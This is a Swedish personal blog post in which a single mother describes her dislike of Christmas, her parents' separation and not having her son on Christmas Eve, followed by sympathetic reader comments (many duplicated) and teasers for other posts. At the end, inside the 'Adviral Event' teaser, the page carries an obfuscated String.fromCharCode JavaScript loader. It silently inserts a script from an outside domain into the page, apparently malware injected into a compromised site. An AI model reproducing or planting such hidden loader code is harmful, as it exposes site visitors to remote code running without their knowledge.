Jag är så trött på julen att jag vill kräkas!!!!!!

image

 

Jul-stress, jul-shopping, jul-musik, jul-stämning! Alltså på riktigt! Nu är jag en riktig glädje dödar! Men jag är så trött på julen att jag vill kräkas!!!

Då är det dessutom exakt 1 vecka kvar till julafton.

 jag vet om ursökt i förväg då mitt humör inte är på topp! 

Julen är en högtid som ska innebära ”mys, kvalitetstid Med sina nära och kära” osv… Men för alla människor som inte har den ”perfekta” familjen, så kan det också innebära en enorm ångest och en stressfaktor!

julen har för mig varit långtifrån en ”mysig familjestund” ! Mina föräldrar valde för mååååååånga år sedan att separera på just julafton. I mitt tidiga vuxenliv spenderad jag flera julafton helt ensam… 

När jag träffade Lillemans pappa fick jag spendera julafton med han x-fru och hela hennes släkt, lååååååångt ifrån mysigt och välkommande! -hehe! (Det är ingenting som jag saknar) 

I tio år har jag haft My’s Blommor, inom blomsterbramschen jobbar man som tomtens små nissar med all jul-grupper och arrangemang inför julafton. Det däremot tycker jag extremt mycket om!

Alla som tar emot buden blir så tacksamma och glada… Stämningen i butiken är på topp! Då rycks jag med, inspireras och önskar gladeligen var och varannan människa en riktigt god jul….

-Det menar jag verkligen! 

image

 

jag är som du vet ensamstående till min älskade Lilleman. Jag blev lämnad med honom strax efter BB, efter ett förhållande på ca 6år. När han var liten så bodde han helt hos mig…. Rent egoistisk så hade jag gärna fortsatt så!  Jag menar drömmen om en kärnfamilj var ju redan helt förstörd!

Jag kommer ihåg hur jag svor för mig själv! ”Varför ska jag ha en pappa till min son som bryr sig, kan inte jag också ha en sånär pappa som skiter i vilket och inte bryr sig” (som så många andra ändå gör) Den där tanken kändes så rätt, för ett ögonblick eller  två…. Sen sekunden senare så fick jag dåligt samvete över att jag ens tänkte tanken!

SJÄLVKLART  har han rätt till båda sina föräldrar.

På den vägen är det. Alla egoistiska mamma-känslor är bortprioriterade  och jag gör mitt yttersta  för att förlika mig med ”varannan vecka livet”

 Jag kommer dock ALDRIG tycka om det! Men nu är det som det är… Och som vanligt så ligger fokus på att göra det bästa av situationen..

-vad har detta med julafton och min extremt negativa inställning till julen att göra?

Jo, det är inte min barnjul…… Jag har alltså inte Ludvig på julafton! Det gör ont, känns inte bra och gör mig Ledsen! Så just precis nu i skrivande stund så är jag extremt långt ifrån någon julstämning!!!!!!!!!!!!!!!

Självklart ska jag ha en ”egen” julafton för honom, och han ska inte få känna av min jul-bitterhet! jag sätter på mig mitt mamma-pokerface 😉 -Det är jag bra på!

Nu ska jag ta min träningsvärk, dra täcket över huvudet och vakna med en ny energi och på bättre humör 😉 kram & gonatt! /My Martens

35 Komentarer

 1. Usch det låter tufft för dig att vara utan din son på julafton. Men alltså vilken fin och bra mamma du verkar vara! Jag känner i dina inlägg om din son hur mycket du älskar och lever för honom!! Du verkar ALLTID göra det bästa för just honom och utifrån situationen. Och att du klarar av att lägga dina bittra känslor åt sidan inför honom är stort som förälder! Du är great!!!! Keep it up! Och jag önskar dig en god jul lite extra mycket iår!! // Sandra

   • Jag vet precis hur du känner.
    Förra julen var jag nydumpad och första gången som mina barn inte skulle vara hos mig. Som jag grät! Både över förlorad kärlek och att fira utan barnen. Jag volontärade på ett ställe och delade ut klappar och mat till hemlösa istället. I år har jag mina barn på julafton iallafall, men den som dumpade mig flera julen och som jag sen tog tillbaka har gjort samma sak igen, denna jul. Suck, julen för verkligen med sig delade känslor. I vilket fall: stor kram till dig. Jag hoppas du hittar någon slags ro och att du får en härlig ledighet.

 2. ÅÅÅhhh vad jag känner med dig!! Är ganska säker på att jag känt liknande om jag inte fått vara med mina barn julafton… Förstår dina ego-tankar och dom måste du få ha. Du verkar vara en alldeles fantastisk mamma och jag är säker på att ni får era fina juldagar tillsammans trots allt. Kämpa på o önskar dig allt gott!!
  Stor Varm KRAM <3 Christina

 3. Försöker också tagga för att få julkänslan och ordna för mina barn och familj men har verkligen ingen julkänslan. Tycker mest att julen är en stressig tid där prestationsångest gör sig påtaglig. Alla verkar vara så lyckliga och ha pyntat så perfekt. Härligt att läsa att alla inte är så perfekta kram kram

 4. Usch det låter tufft för dig att vara utan din son på julafton. Men alltså vilken fin och bra mamma du verkar vara! Jag känner i dina inlägg om din son hur mycket du älskar och lever för honom!! Du verkar ALLTID göra det bästa för just honom och utifrån situationen. Och att du klarar av att lägga dina bittra känslor åt sidan inför honom är stort som förälder! Du är great!!!! Keep it up! Och jag önskar dig en god jul lite extra mycket iår!! // Sandra

   • Jag vet precis hur du känner.
    Förra julen var jag nydumpad och första gången som mina barn inte skulle vara hos mig. Som jag grät! Både över förlorad kärlek och att fira utan barnen. Jag volontärade på ett ställe och delade ut klappar och mat till hemlösa istället. I år har jag mina barn på julafton iallafall, men den som dumpade mig flera julen och som jag sen tog tillbaka har gjort samma sak igen, denna jul. Suck, julen för verkligen med sig delade känslor. I vilket fall: stor kram till dig. Jag hoppas du hittar någon slags ro och att du får en härlig ledighet.

 5. ÅÅÅhhh vad jag känner med dig!! Är ganska säker på att jag känt liknande om jag inte fått vara med mina barn julafton… Förstår dina ego-tankar och dom måste du få ha. Du verkar vara en alldeles fantastisk mamma och jag är säker på att ni får era fina juldagar tillsammans trots allt. Kämpa på o önskar dig allt gott!!
  Stor Varm KRAM <3 Christina

 6. Försöker också tagga för att få julkänslan och ordna för mina barn och familj men har verkligen ingen julkänslan. Tycker mest att julen är en stressig tid där prestationsångest gör sig påtaglig. Alla verkar vara så lyckliga och ha pyntat så perfekt. Härligt att läsa att alla inte är så perfekta kram kram

 7. Hej du fina!
  Du är välkommen till mig och mannen (mina barn har pappa-jul…) du kan få sitta i mitten för lite soffmys och bubbel ?
  Jag har haft varannan vecka ungefär ett år. Kan erkänna att när det blev bestämt la jag mig i fosterställning och grät ? Det blir lite lättare med tiden men både jag och mannen saknar guldklimparna när de är hos pappan.
  Var rädd om dig
  Kram/A

 8. Hej du fina!
  Du är välkommen till mig och mannen (mina barn har pappa-jul…) du kan få sitta i mitten för lite soffmys och bubbel 😉
  Jag har haft varannan vecka ungefär ett år. Kan erkänna att när det blev bestämt la jag mig i fosterställning och grät 🙁 Det blir lite lättare med tiden men både jag och mannen saknar guldklimparna när de är hos pappan.
  Var rädd om dig
  Kram/A

 9. Hej My..
  Som jag känner igen mig om det du skrev.. ?, har också en son, mitt allt.. Delar honom varannan vecka med hans pappa som verkligen bryr sig.. Har också önskat MÅNGA GGR att han inte skulle bry sig så mycket.. Men liksom du säger har jag fått sätta mina egna känslor åt sidan och försöka le och vara glad när hans pappa hämtar honom.. Jag kommer heller ALDRIG att tycka om det här varannan vecka livet. Känner att det är mitt livs största sorg, att inte få vara med min pojke varje dag. Kämpar precis som du med att försöka göra det bästa som går av situationen.. Kan ju inte trösta dig o inte mig själv men ville ändå skriva för att du ska veta att du är inte ensam om att känna dig så:(..

 10. Alla har inte perfekt jul. Släkten och små tjafs efter nån timme,haha
  Det man ska fira är ju Jesus födelse.
  Du får ha lilljul som du skrev med din son.
  Kram

 11. Hej My..
  Som jag känner igen mig om det du skrev.. :(, har också en son, mitt allt.. Delar honom varannan vecka med hans pappa som verkligen bryr sig.. Har också önskat MÅNGA GGR att han inte skulle bry sig så mycket.. Men liksom du säger har jag fått sätta mina egna känslor åt sidan och försöka le och vara glad när hans pappa hämtar honom.. Jag kommer heller ALDRIG att tycka om det här varannan vecka livet. Känner att det är mitt livs största sorg, att inte få vara med min pojke varje dag. Kämpar precis som du med att försöka göra det bästa som går av situationen.. Kan ju inte trösta dig o inte mig själv men ville ändå skriva för att du ska veta att du är inte ensam om att känna dig så:(..

 12. Alla har inte perfekt jul. Släkten och små tjafs efter nån timme,haha
  Det man ska fira är ju Jesus födelse.
  Du får ha lilljul som du skrev med din son.
  Kram

 13. Kramis t dej. Bra du delar med dej även om jobbiga saker. Jag singel o julen är inte så kul då. Men vi går mot ljusare tider och mycket bra kan hända. Kan du visa någon gång vilket smink du har. Ha det fint.

 14. Kramis t dej. Bra du delar med dej även om jobbiga saker. Jag singel o julen är inte så kul då. Men vi går mot ljusare tider och mycket bra kan hända. Kan du visa någon gång vilket smink du har. Ha det fint.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/